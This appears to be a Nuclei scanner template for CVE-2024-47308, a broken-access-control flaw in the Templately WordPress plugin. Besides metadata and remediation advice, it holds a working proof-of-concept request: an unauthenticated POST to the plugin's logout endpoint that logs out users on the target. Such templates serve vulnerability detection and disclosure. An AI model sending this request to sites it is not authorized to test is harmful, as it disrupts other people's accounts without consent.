Templately allow an attacker to logout users who signed in to their templately account, so you can sign in your templately account to exploit this vulnerability. Go to http://IP/wordpress/wp-admin/admin.php?page=templately&path=sign-in to sign in then logout.
PoC代码[已公开]
id: CVE-2024-47308
info:
name: Templately <= 3.1.2 - Broken Access Control
author: popcorn94
severity: medium
description: |
Templately allow an attacker to logout users who signed in to their templately account, so you can sign in your templately account to exploit this vulnerability. Go to http://IP/wordpress/wp-admin/admin.php?page=templately&path=sign-in to sign in then logout.
impact: |
Attackers can access restricted functionalities, potentially leading to unauthorized actions or data exposure.
remediation: |
Update to the latest version of Templately that addresses this issue.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/templately/templately-312-missing-authorization
- https://patchstack.com/database/vulnerability/templately/wordpress-templately-plugin-3-1-2-broken-access-control-vulnerability?_s_id=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
cvss-score: 6.5
cve-id: CVE-2024-47308
cwe-id: CWE-862
epss-score: 0.52154
epss-percentile: 0.97789
cpe: cpe:2.3:a:templately:templately:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
vendor: templately
product: templately
framework: wordpress
tags: cve,cve2024,wpscan,wp-plugin,templately,wordpress,vkev
http:
- raw:
- |
POST /wp-json/templately/v1/logout?_locale=user HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "status\":\"success","message\":\"Logged out.")'
condition: and
# digest: 490a0046304402206c64236331d81846f27a52639eb759477f8bb8107872d7687f9a3c18798b3e0902206a216cd12536f1c1618c0091f11975808631e6e4ee9c736ba8fee11de4a30716:922c64590222798bb761d5b6d8e72950